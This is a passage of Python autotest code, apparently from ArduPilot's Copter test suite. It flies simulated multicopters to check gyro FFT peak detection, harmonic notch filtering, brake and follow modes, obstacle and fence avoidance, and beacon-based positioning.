self.progress("Detected motor peak at %fHz, throttle %f%%, %fdB" % (freq, vfr_hud.throttle, peakdb))
# we have a peak make sure that the FFT detected something close
# logging is at 10Hz
mlog = self.dfreader_for_current_onboard_log()
# accuracy is determined by sample rate and fft length, given our use of quinn we could probably use half of this
freqDelta = 1000. / fftLength
pkAvg = freq
nmessages = 1
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6)
)
freqs = []
while m is not None:
nmessages = nmessages + 1
freqs.append(m.PkAvg)
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6)
)
# peak within resolution of FFT length
pkAvg = numpy.median(numpy.asarray(freqs))
self.progress("Detected motor peak at %fHz processing %d messages" % (pkAvg, nmessages))
# peak within 5%
if abs(pkAvg - freq) > freqDelta:
raise NotAchievedException("FFT did not detect a motor peak at %f, found %f, wanted %f" % (dblevel, pkAvg, freq))
return freq
def fly_gyro_fft_harmonic(self):
"""Use dynamic harmonic notch to control motor noise with harmonic matching of the first harmonic."""
# basic gyro sample rate test
self.progress("Flying with gyro FFT harmonic - Gyro sample rate")
self.context_push()
ex = None
# we are dealing with probabalistic scenarios involving threads, have two bites at the cherry
try:
self.start_subtest("Hover to calculate approximate hover frequency")
# magic tridge EKF type that dramatically speeds up the test
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"EK2_ENABLE": 0,
"EK3_ENABLE": 0,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"INS_GYRO_FILTER": 100,
"INS_FAST_SAMPLE": 0,
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_DRIFT_SPEED": 0,
"SIM_DRIFT_TIME": 0,
"FFT_THR_REF": self.get_parameter("MOT_THST_HOVER"),
"SIM_GYR1_RND": 20, # enable a noisy gyro
})
# motor peak enabling FFT will also enable the arming
# check, self-testing the functionality
self.set_parameters({
"FFT_ENABLE": 1,
"FFT_MINHZ": 50,
"FFT_MAXHZ": 450,
"FFT_SNR_REF": 10,
})
# Step 1: inject actual motor noise and use the FFT to track it
self.set_parameters({
"SIM_VIB_MOT_MAX": 250, # gives a motor peak at about 175Hz
"FFT_WINDOW_SIZE": 64,
"FFT_WINDOW_OLAP": 0.75,
})
self.reboot_sitl()
freq = self.hover_and_check_matched_frequency(-15, 100, 250, 64)
# Step 2: add a second harmonic and check the first is still tracked
self.start_subtest("Add a fixed frequency harmonic at twice the hover frequency "
"and check the right harmonic is found")
self.set_parameters({
"SIM_VIB_FREQ_X": freq * 2,
"SIM_VIB_FREQ_Y": freq * 2,
"SIM_VIB_FREQ_Z": freq * 2,
"SIM_VIB_MOT_MULT": 0.25, # halve the motor noise so that the higher harmonic dominates
})
self.reboot_sitl()
self.hover_and_check_matched_frequency(-15, 100, 250, 64, None)
# Step 3: switch harmonics mid flight and check for tracking
self.start_subtest("Switch harmonics mid flight and check the right harmonic is found")
self.set_parameter("FFT_HMNC_PEAK", 0)
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
hover_time = 10
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
self.set_parameter("SIM_VIB_MOT_MULT", 5.0)
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
mlog = self.dfreader_for_current_onboard_log()
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6))
freqs = []
while m is not None:
freqs.append(m.PkAvg)
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6))
# peak within resolution of FFT length, the highest energy peak switched but our detection should not
pkAvg = numpy.median(numpy.asarray(freqs))
freqDelta = 1000. / self.get_parameter("FFT_WINDOW_SIZE")
if abs(pkAvg - freq) > freqDelta:
raise NotAchievedException("FFT did not detect a harmonic motor peak, found %f, wanted %f" % (pkAvg, freq))
# Step 4: dynamic harmonic
self.start_subtest("Enable dynamic harmonics and make sure both frequency peaks are attenuated")
# find a motor peak
freq, vfr_hud, peakdb = self.hover_and_check_matched_frequency_with_fft(-15, 100, 350)
# now add a dynamic notch and check that the peak is squashed
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_HNTCH_ENABLE": 1,
"INS_HNTCH_HMNCS": 3,
"INS_HNTCH_MODE": 4,
"INS_HNTCH_FREQ": freq,
"INS_HNTCH_REF": vfr_hud.throttle/100.0,
"INS_HNTCH_ATT": 100,
"INS_HNTCH_BW": freq/2,
"INS_HNTCH_OPTS": 3,
})
self.reboot_sitl()
# 5db is far in excess of the attenuation that the double dynamic-harmonic notch is able
# to provide (-7dB on average), but without the notch the peak is around 20dB so still a safe test
self.hover_and_check_matched_frequency_with_fft(5, 100, 350, reverse=True)
self.set_parameters({
"SIM_VIB_FREQ_X": 0,
"SIM_VIB_FREQ_Y": 0,
"SIM_VIB_FREQ_Z": 0,
"SIM_VIB_MOT_MULT": 1.0,
})
# prevent update parameters from messing with the settings when we pop the context
self.set_parameter("FFT_ENABLE", 0)
self.reboot_sitl()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
# need a final reboot because weird things happen to your
# vehicle state when switching back from EKF type 10!
self.reboot_sitl()
if ex is not None:
raise ex
def fly_gyro_fft(self):
"""Use dynamic harmonic notch to control motor noise."""
# basic gyro sample rate test
self.progress("Flying with gyro FFT - Gyro sample rate")
self.context_push()
ex = None
try:
# magic tridge EKF type that dramatically speeds up the test
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"EK2_ENABLE": 0,
"EK3_ENABLE": 0,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"INS_GYRO_FILTER": 100,
"INS_FAST_SAMPLE": 0,
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_DRIFT_SPEED": 0,
"SIM_DRIFT_TIME": 0,
"SIM_GYR1_RND": 20, # enable a noisy motor peak
})
# enabling FFT will also enable the arming check,
# self-testing the functionality
self.set_parameters({
"FFT_ENABLE": 1,
"FFT_MINHZ": 50,
"FFT_MAXHZ": 450,
"FFT_SNR_REF": 10,
"FFT_WINDOW_SIZE": 128,
"FFT_WINDOW_OLAP": 0.75,
"FFT_SAMPLE_MODE": 0,
})
# Step 1: inject a very precise noise peak at 250hz and make sure the in-flight fft
# can detect it really accurately. For a 128 FFT the frequency resolution is 8Hz so
# a 250Hz peak should be detectable within 5%
self.start_subtest("Inject noise at 250Hz and check the FFT can find the noise")
self.set_parameters({
"SIM_VIB_FREQ_X": 250,
"SIM_VIB_FREQ_Y": 250,
"SIM_VIB_FREQ_Z": 250,
})
self.reboot_sitl()
# find a motor peak
self.hover_and_check_matched_frequency(-15, 100, 350, 128, 250)
# Step 1b: run the same test with an FFT length of 256 which is needed to flush out a
# whole host of bugs related to uint8_t. This also tests very accurately the frequency resolution
self.set_parameter("FFT_WINDOW_SIZE", 256)
self.start_subtest("Inject noise at 250Hz and check the FFT can find the noise")
self.reboot_sitl()
# find a motor peak
self.hover_and_check_matched_frequency(-15, 100, 350, 256, 250)
self.set_parameter("FFT_WINDOW_SIZE", 128)
# Step 2: inject actual motor noise and use the standard length FFT to track it
self.start_subtest("Hover and check that the FFT can find the motor noise")
self.set_parameters({
"SIM_VIB_FREQ_X": 0,
"SIM_VIB_FREQ_Y": 0,
"SIM_VIB_FREQ_Z": 0,
"SIM_VIB_MOT_MAX": 250, # gives a motor peak at about 175Hz
"FFT_WINDOW_SIZE": 32,
"FFT_WINDOW_OLAP": 0.5,
})
self.reboot_sitl()
freq = self.hover_and_check_matched_frequency(-15, 100, 250, 32)
self.set_parameter("SIM_VIB_MOT_MULT", 1.)
# Step 3: add a FFT dynamic notch and check that the peak is squashed
self.start_subtest("Add a dynamic notch, hover and check that the noise peak is now gone")
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_HNTCH_ENABLE": 1,
"INS_HNTCH_FREQ": freq,
"INS_HNTCH_REF": 1.0,
"INS_HNTCH_ATT": 50,
"INS_HNTCH_BW": freq/2,
"INS_HNTCH_MODE": 4,
})
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
hover_time = 15
self.progress("Hovering for %u seconds" % hover_time)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
# fly fast forrest!
self.set_rc(3, 1900)
self.set_rc(2, 1200)
self.wait_groundspeed(5, 1000)
self.set_rc(3, 1500)
self.set_rc(2, 1500)
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
# batch sampler defaults give 1024 fft and sample rate of 1kz so roughly 1hz/bin
scale = 1000. / 1024.
sminhz = int(100 * scale)
smaxhz = int(350 * scale)
freq = psd["F"][numpy.argmax(psd["X"][sminhz:smaxhz]) + sminhz]
peakdb = numpy.amax(psd["X"][sminhz:smaxhz])
if peakdb < 0:
self.progress("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
else:
raise NotAchievedException("Detected %fHz motor peak at %fdB" % (freq, peakdb))
# Step 4: loop sample rate test with larger window
self.start_subtest("Hover and check that the FFT can find the motor noise when running at fast loop rate")
# we are limited to half the loop rate for frequency detection
self.set_parameters({
"FFT_MAXHZ": 185,
"INS_LOG_BAT_OPT": 0,
"SIM_VIB_MOT_MAX": 220,
"FFT_WINDOW_SIZE": 64,
"FFT_WINDOW_OLAP": 0.75,
"FFT_SAMPLE_MODE": 1,
})
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
self.progress("Hovering for %u seconds" % hover_time)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
# prevent update parameters from messing with the settings when we pop the context
self.set_parameter("FFT_ENABLE", 0)
self.reboot_sitl()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
# must reboot after we move away from EKF type 10 to EKF2 or EKF3
self.reboot_sitl()
if ex is not None:
raise ex
def fly_brake_mode(self):
# test brake mode
self.progress("Testing brake mode")
self.takeoff(10, mode="LOITER")
self.progress("Ensuring RC inputs have no effect in brake mode")
self.change_mode("STABILIZE")
self.set_rc(3, 1500)
self.set_rc(2, 1200)
self.wait_groundspeed(5, 1000)
self.change_mode("BRAKE")
self.wait_groundspeed(0, 1)
self.set_rc(2, 1500)
self.do_RTL()
self.progress("Ran brake mode")
def fly_guided_move_to(self, destination, timeout=30):
'''move to mavutil.location location; absolute altitude'''
tstart = self.get_sim_time()
self.mav.mav.set_position_target_global_int_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_GLOBAL_INT,
0b1111111111111000, # mask specifying use-only-lat-lon-alt
int(destination.lat * 1e7), # lat
int(destination.lng * 1e7), # lon
destination.alt, # alt
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
while True:
if self.get_sim_time() - tstart > timeout:
raise NotAchievedException()
delta = self.get_distance(self.mav.location(), destination)
self.progress("delta=%f (want <1)" % delta)
if delta < 1:
break
def test_altitude_types(self):
'''start by disabling GCS failsafe, otherwise we immediately disarm
due to (apparently) not receiving traffic from the GCS for
too long. This is probably a function of --speedup'''
'''this test flies the vehicle somewhere lower than were it started.
It then disarms. It then arms, which should reset home to the
new, lower altitude. This delta should be outside 1m but
within a few metres of the old one.
'''
# we must start mavproxy here as otherwise we can't get the
# terrain database tiles - this leads to random failures in
# CI!
mavproxy = self.start_mavproxy()
self.set_parameter("FS_GCS_ENABLE", 0)
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
max_initial_home_alt_m = 500
if m.relative_alt > max_initial_home_alt_m:
raise NotAchievedException("Initial home alt too high (%fm > %fm)" %
(m.relative_alt*1000, max_initial_home_alt_m*1000))
orig_home_offset_mm = m.alt - m.relative_alt
self.user_takeoff(5)
self.progress("Flying to low position")
current_alt = self.mav.location().alt
# 10m delta low_position = mavutil.location(-35.358273, 149.169165, current_alt, 0)
low_position = mavutil.location(-35.36200016, 149.16415599, current_alt, 0)
self.fly_guided_move_to(low_position, timeout=240)
self.change_mode('LAND')
# expecting home to change when disarmed
self.wait_landed_and_disarmed()
# wait a while for home to move (it shouldn't):
self.delay_sim_time(10)
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
new_home_offset_mm = m.alt - m.relative_alt
home_offset_delta_mm = orig_home_offset_mm - new_home_offset_mm
self.progress("new home offset: %f delta=%f" %
(new_home_offset_mm, home_offset_delta_mm))
self.progress("gpi=%s" % str(m))
max_home_offset_delta_mm = 10
if home_offset_delta_mm > max_home_offset_delta_mm:
raise NotAchievedException("Large home offset delta: want<%f got=%f" %
(max_home_offset_delta_mm, home_offset_delta_mm))
self.progress("Ensuring home moves when we arm")
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
post_arming_home_offset_mm = m.alt - m.relative_alt
self.progress("post-arming home offset: %f" % (post_arming_home_offset_mm))
self.progress("gpi=%s" % str(m))
min_post_arming_home_offset_delta_mm = -3000
max_post_arming_home_offset_delta_mm = -4000
delta_between_original_home_alt_offset_and_new_home_alt_offset_mm = post_arming_home_offset_mm - orig_home_offset_mm
self.progress("delta=%f-%f=%f" % (
post_arming_home_offset_mm,
orig_home_offset_mm,
delta_between_original_home_alt_offset_and_new_home_alt_offset_mm))
self.progress("Home moved %fm vertically" % (delta_between_original_home_alt_offset_and_new_home_alt_offset_mm/1000.0))
if delta_between_original_home_alt_offset_and_new_home_alt_offset_mm > min_post_arming_home_offset_delta_mm:
raise NotAchievedException(
"Home did not move vertically on arming: want<=%f got=%f" %
(min_post_arming_home_offset_delta_mm, delta_between_original_home_alt_offset_and_new_home_alt_offset_mm))
if delta_between_original_home_alt_offset_and_new_home_alt_offset_mm < max_post_arming_home_offset_delta_mm:
raise NotAchievedException(
"Home moved too far vertically on arming: want>=%f got=%f" %
(max_post_arming_home_offset_delta_mm, delta_between_original_home_alt_offset_and_new_home_alt_offset_mm))
self.wait_disarmed()
self.stop_mavproxy(mavproxy)
def fly_precision_companion(self):
"""Use Companion PrecLand backend precision messages to loiter."""
self.context_push()
ex = None
try:
self.set_parameter("PLND_ENABLED", 1)
# enable companion backend:
self.set_parameter("PLND_TYPE", 1)
self.set_analog_rangefinder_parameters()
# set up a channel switch to enable precision loiter:
self.set_parameter("RC7_OPTION", 39)
self.reboot_sitl()
self.progress("Waiting for location")
self.mav.location()
self.zero_throttle()
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
# we should be doing precision loiter at this point
start = self.mav.recv_match(type='LOCAL_POSITION_NED',
blocking=True)
self.arm_vehicle()
self.set_rc(3, 1800)
alt_min = 10
self.wait_altitude(alt_min,
(alt_min + 5),
relative=True)
self.set_rc(3, 1500)
# move away a little
self.set_rc(2, 1550)
self.wait_distance(5, accuracy=1)
self.set_rc(2, 1500)
self.change_mode('LOITER')
# turn precision loiter on:
self.set_rc(7, 2000)
# try to drag aircraft to a position 5 metres north-east-east:
self.loiter_to_ne(start.x + 5, start.y + 10, start.z + 10)
self.loiter_to_ne(start.x + 5, start.y - 10, start.z + 10)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.zero_throttle()
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.progress("All done")
if ex is not None:
raise ex
def loiter_requires_position(self):
# ensure we can't switch to LOITER without position
self.progress("Ensure we can't enter LOITER without position")
self.context_push()
self.set_parameter("GPS_TYPE", 2)
self.set_parameter("SIM_GPS_DISABLE", 1)
self.reboot_sitl()
# check for expected EKF flags
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
expected_ekf_flags = (mavutil.mavlink.ESTIMATOR_ATTITUDE |
mavutil.mavlink.ESTIMATOR_VELOCITY_VERT |
mavutil.mavlink.ESTIMATOR_POS_VERT_ABS |
mavutil.mavlink.ESTIMATOR_CONST_POS_MODE)
if ahrs_ekf_type == 2:
expected_ekf_flags = expected_ekf_flags | mavutil.mavlink.ESTIMATOR_PRED_POS_HORIZ_REL
self.wait_ekf_flags(expected_ekf_flags, 0, timeout=120)
# arm in Stabilize and attempt to switch to Loiter
self.change_mode('STABILIZE')
self.arm_vehicle()
self.context_collect('STATUSTEXT')
self.run_cmd_do_set_mode(
"LOITER",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.wait_statustext("requires position", check_context=True)
self.disarm_vehicle()
self.context_pop()
self.reboot_sitl()
def test_arm_feature(self):
self.loiter_requires_position()
super(AutoTestCopter, self).test_arm_feature()
def test_parameter_checks(self):
self.test_parameter_checks_poscontrol("PSC")
def fly_poshold_takeoff(self):
"""ensure vehicle stays put until it is ready to fly"""
self.context_push()
ex = None
try:
self.set_parameter("PILOT_TKOFF_ALT", 700)
self.change_mode('POSHOLD')
self.set_rc(3, 1000)
self.wait_ready_to_arm()
self.arm_vehicle()
self.delay_sim_time(2)
# check we are still on the ground...
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
if abs(m.relative_alt) > 100:
raise NotAchievedException("Took off prematurely")
self.progress("Pushing throttle up")
self.set_rc(3, 1710)
self.delay_sim_time(0.5)
self.progress("Bringing back to hover throttle")
self.set_rc(3, 1500)
# make sure we haven't already reached alt:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
max_initial_alt = 500
if abs(m.relative_alt) > max_initial_alt:
raise NotAchievedException("Took off too fast (%f > %f" %
(abs(m.relative_alt), max_initial_alt))
self.progress("Monitoring takeoff-to-alt")
self.wait_altitude(6.9, 8, relative=True)
self.progress("Making sure we stop at our takeoff altitude")
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 5:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
delta = abs(7000 - m.relative_alt)
self.progress("alt=%f delta=%f" % (m.relative_alt/1000,
delta/1000))
if delta > 1000:
raise NotAchievedException("Failed to maintain takeoff alt")
self.progress("takeoff OK")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.land_and_disarm()
self.set_rc(8, 1000)
self.context_pop()
if ex is not None:
raise ex
def initial_mode(self):
return "STABILIZE"
def initial_mode_switch_mode(self):
return "STABILIZE"
def default_mode(self):
return "STABILIZE"
def rc_defaults(self):
ret = super(AutoTestCopter, self).rc_defaults()
ret[3] = 1000
ret[5] = 1800 # mode switch
return ret
def test_manual_control(self):
'''test manual_control mavlink message'''
self.set_parameter("SYSID_MYGCS", self.mav.source_system)
self.change_mode('STABILIZE')
self.takeoff(10)
tstart = self.get_sim_time_cached()
want_pitch_degrees = -12
while True:
if self.get_sim_time_cached() - tstart > 10:
raise AutoTestTimeoutException("Did not reach pitch")
self.progress("Sending pitch-forward")
self.mav.mav.manual_control_send(
1, # target system
500, # x (pitch)
32767, # y (roll)
32767, # z (thrust)
32767, # r (yaw)
0) # button mask
m = self.mav.recv_match(type='ATTITUDE', blocking=True, timeout=1)
print("m=%s" % str(m))
if m is None:
continue
p = math.degrees(m.pitch)
self.progress("pitch=%f want<=%f" % (p, want_pitch_degrees))
if p <= want_pitch_degrees:
break
self.mav.mav.manual_control_send(
1, # target system
32767, # x (pitch)
32767, # y (roll)
32767, # z (thrust)
32767, # r (yaw)
0) # button mask
self.do_RTL()
def check_avoidance_corners(self):
self.takeoff(10, mode="LOITER")
self.set_rc(2, 1400)
west_loc = mavutil.location(-35.363007,
149.164911,
0,
0)
self.wait_location(west_loc, accuracy=6)
north_loc = mavutil.location(-35.362908,
149.165051,
0,
0)
self.reach_heading_manual(0)
self.wait_location(north_loc, accuracy=6, timeout=200)
self.reach_heading_manual(90)
east_loc = mavutil.location(-35.363013,
149.165194,
0,
0)
self.wait_location(east_loc, accuracy=6)
self.reach_heading_manual(225)
self.wait_location(west_loc, accuracy=6, timeout=200)
self.set_rc(2, 1500)
self.do_RTL()
def OBSTACLE_DISTANCE_3D_test_angle(self, angle):
now = self.get_sim_time_cached()
distance = 15
right = distance * math.sin(math.radians(angle))
front = distance * math.cos(math.radians(angle))
down = 0
expected_distance_cm = distance * 100
# expected orientation
expected_orientation = int((angle+22.5)/45) % 8
self.progress("Angle %f expected orient %u" %
(angle, expected_orientation))
tstart = self.get_sim_time()
last_send = 0
while True:
now = self.get_sim_time_cached()
if now - tstart > 10:
raise NotAchievedException("Did not get correct angle back")
if now - last_send > 0.1:
self.progress("ang=%f sending front=%f right=%f" %
(angle, front, right))
self.mav.mav.obstacle_distance_3d_send(
int(now*1000), # time_boot_ms
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER,
mavutil.mavlink.MAV_FRAME_BODY_FRD,
65535,
front, # x (m)
right, # y (m)
down, # z (m)
0, # min_distance (m)
20 # max_distance (m)
)
last_send = now
m = self.mav.recv_match(type="DISTANCE_SENSOR",
blocking=True,
timeout=1)
if m is None:
continue
# self.progress("Got (%s)" % str(m))
if m.orientation != expected_orientation:
# self.progress("Wrong orientation (want=%u got=%u)" %
# (expected_orientation, m.orientation))
continue
if abs(m.current_distance - expected_distance_cm) > 1:
# self.progress("Wrong distance (want=%f got=%f)" %
# (expected_distance_cm, m.current_distance))
continue
self.progress("distance-at-angle good")
break
def OBSTACLE_DISTANCE_3D(self):
self.context_push()
ex = None
try:
self.set_parameters({
"SERIAL5_PROTOCOL": 1,
"PRX_TYPE": 2,
})
self.reboot_sitl()
for angle in range(0, 360):
self.OBSTACLE_DISTANCE_3D_test_angle(angle)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_proximity_avoidance_test_corners(self):
self.start_subtest("Corners")
self.context_push()
ex = None
try:
self.load_fence("copter-avoidance-fence.txt")
self.set_parameter("FENCE_ENABLE", 1)
self.set_parameter("PRX_TYPE", 10)
self.set_parameter("RC10_OPTION", 40) # proximity-enable
self.reboot_sitl()
self.progress("Enabling proximity")
self.set_rc(10, 2000)
self.check_avoidance_corners()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.clear_fence()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_proximity_avoidance_test_alt_no_avoid(self):
self.start_subtest("Alt-no-avoid")
self.context_push()
ex = None
try:
self.set_parameter("PRX_TYPE", 2)
self.set_parameter("AVOID_ALT_MIN", 10)
self.set_analog_rangefinder_parameters()
self.reboot_sitl()
tstart = self.get_sim_time()
self.change_mode('LOITER')
while True:
if self.armed():
break
if self.get_sim_time_cached() - tstart > 60:
raise AutoTestTimeoutException("Did not arm")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
500, # max_distance cm
400, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
26, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE, # orientation
255 # covariance
)
self.send_cmd(mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
1, # ARM
0,
0,
0,
0,
0,
0)
self.wait_heartbeat()
self.takeoff(15, mode='LOITER')
self.progress("Poking vehicle; should avoid")
def shove(a, b):
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
500, # max_distance cm
20, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE, # orientation
255 # covariance
)
self.wait_speed_vector_bf(
Vector3(-0.4, 0.0, 0.0),
timeout=10,
called_function=shove,
)
self.change_alt(5)
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 10:
break
vel = self.get_body_frame_velocity()
if vel.length() > 0.3:
raise NotAchievedException("Moved too much (%s)" %
(str(vel),))
shove(None, None)
except Exception as e:
self.progress("Caught exception: %s" %
self.get_exception_stacktrace(e))
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_proximity_avoidance_test(self):
self.fly_proximity_avoidance_test_alt_no_avoid()
self.fly_proximity_avoidance_test_corners()
def fly_fence_avoidance_test(self):
self.context_push()
ex = None
try:
self.load_fence("copter-avoidance-fence.txt")
self.set_parameter("FENCE_ENABLE", 1)
self.check_avoidance_corners()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.clear_fence()
self.disarm_vehicle(force=True)
if ex is not None:
raise ex
def global_position_int_for_location(self, loc, time_boot, heading=0):
return self.mav.mav.global_position_int_encode(
int(time_boot * 1000), # time_boot_ms
int(loc.lat * 1e7),
int(loc.lng * 1e7),
int(loc.alt * 1000), # alt in mm
20, # relative alt - urp.
vx=0,
vy=0,
vz=0,
hdg=heading
)
def fly_follow_mode(self):
self.set_parameter("FOLL_ENABLE", 1)
self.set_parameter("FOLL_SYSID", self.mav.source_system)
foll_ofs_x = 30 # metres
self.set_parameter("FOLL_OFS_X", -foll_ofs_x)
self.set_parameter("FOLL_OFS_TYPE", 1) # relative to other vehicle heading
self.takeoff(10, mode="LOITER")
self.set_parameter("SIM_SPEEDUP", 1)
self.change_mode("FOLLOW")
new_loc = self.mav.location()
new_loc_offset_n = 20
new_loc_offset_e = 30
self.location_offset_ne(new_loc, new_loc_offset_n, new_loc_offset_e)
self.progress("new_loc: %s" % str(new_loc))
heading = 0
if self.mavproxy is not None:
self.mavproxy.send("map icon %f %f greenplane %f\n" %
(new_loc.lat, new_loc.lng, heading))
expected_loc = copy.copy(new_loc)
self.location_offset_ne(expected_loc, -foll_ofs_x, 0)
if self.mavproxy is not None:
self.mavproxy.send("map icon %f %f hoop\n" %
(expected_loc.lat, expected_loc.lng))
self.progress("expected_loc: %s" % str(expected_loc))
last_sent = 0
tstart = self.get_sim_time()
while True:
now = self.get_sim_time_cached()
if now - tstart > 60:
raise NotAchievedException("Did not FOLLOW")
if now - last_sent > 0.5:
gpi = self.global_position_int_for_location(new_loc,
now,
heading=heading)
gpi.pack(self.mav.mav)
self.mav.mav.send(gpi)
self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
pos = self.mav.location()
delta = self.get_distance(expected_loc, pos)
max_delta = 3
self.progress("position delta=%f (want <%f)" % (delta, max_delta))
if delta < max_delta:
break
self.do_RTL()
def get_global_position_int(self, timeout=30):
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not get good global_position_int")
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
self.progress("GPI: %s" % str(m))
if m is None:
continue
if m.lat != 0 or m.lon != 0:
return m
def fly_beacon_position(self):
self.reboot_sitl()
self.wait_ready_to_arm(require_absolute=True)
old_pos = self.get_global_position_int()
print("old_pos=%s" % str(old_pos))
self.context_push()
ex = None
try:
self.set_parameter("BCN_TYPE", 10)
self.set_parameter("BCN_LATITUDE", SITL_START_LOCATION.lat)
self.set_parameter("BCN_LONGITUDE", SITL_START_LOCATION.lng)
self.set_parameter("BCN_ALT", SITL_START_LOCATION.alt)
self.set_parameter("BCN_ORIENT_YAW", 0)
self.set_parameter("AVOID_ENABLE", 4)
self.set_parameter("GPS_TYPE", 0)
self.set_parameter("EK3_ENABLE", 1)
self.set_parameter("EK3_SRC1_POSXY", 4) # Beacon
self.set_parameter("EK3_SRC1_POSZ", 1) # Baro
self.set_parameter("EK3_SRC1_VELXY", 0) # None
self.set_parameter("EK3_SRC1_VELZ", 0) # None
self.set_parameter("EK2_ENABLE", 0)
self.set_parameter("AHRS_EKF_TYPE", 3)
self.reboot_sitl()
# turn off GPS arming checks. This may be considered a
# bug that we need to do this.
old_arming_check = int(self.get_parameter("ARMING_CHECK"))
if old_arming_check == 1:
old_arming_check = 1 ^ 25 - 1
new_arming_check = int(old_arming_check) & ~(1 << 3)
self.set_parameter("ARMING_CHECK", new_arming_check)
self.reboot_sitl()
# require_absolute=True infers a GPS is present
self.wait_ready_to_arm(require_absolute=False)
tstart = self.get_sim_time()
timeout = 20
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not get new position like old position")
self.progress("Fetching location")
new_pos = self.get_global_position_int()
pos_delta = self.get_distance_int(old_pos, new_pos)
max_delta = 1
self.progress("delta=%u want <= %u" % (pos_delta, max_delta))
if pos_delta <= max_delta:
break
self.progress("Moving to ensure location is tracked")
self.takeoff(10, mode="STABILIZE")
self.change_mode("CIRCLE")
tstart = self.get_sim_time()
max_delta = 0
max_allowed_delta = 10
while True:
if self.get_sim_time_cached() - tstart > timeout:
break
pos_delta = self.get_distance_int(self.sim_location_int(), self.get_global_position_int())
self.progress("pos_delta=%f max_delta=%f max_allowed_delta=%f" % (pos_delta, max_delta, max_allowed_delta))
if pos_delta > max_delta:
max_delta = pos_delta
if pos_delta > max_allowed_delta:
raise NotAchievedException("Vehicle location not tracking simulated location (%f > %f)" %
(pos_delta, max_allowed_delta))
self.progress("Tracked location just fine (max_delta=%f)" % max_delta)
self.change_mode("LOITER")
